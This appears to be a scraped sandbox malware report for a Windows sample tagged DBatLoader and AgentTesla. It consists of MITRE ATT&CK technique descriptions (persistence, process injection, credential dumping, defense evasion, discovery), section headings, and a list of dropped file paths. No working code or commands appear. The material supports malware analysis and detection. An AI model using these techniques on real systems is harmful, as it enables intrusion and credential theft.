Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2jbMIxCFsK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\Public\Libraries\PNO

C:\Users\Public\Libraries\Wisrysxl

C:\Users\Public\Libraries\Wisrysxl.PIF

C:\Users\Public\Libraries\lxsyrsiW.cmd

C:\Users\Public\Libraries\lxsyrsiW.pif

C:\Users\Public\Wisrysxl.url

C:\Users\Public\alpha.pif

C:\Users\Public\xpha.pif

Windows Analysis Report
2jbMIxCFsK.exe

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre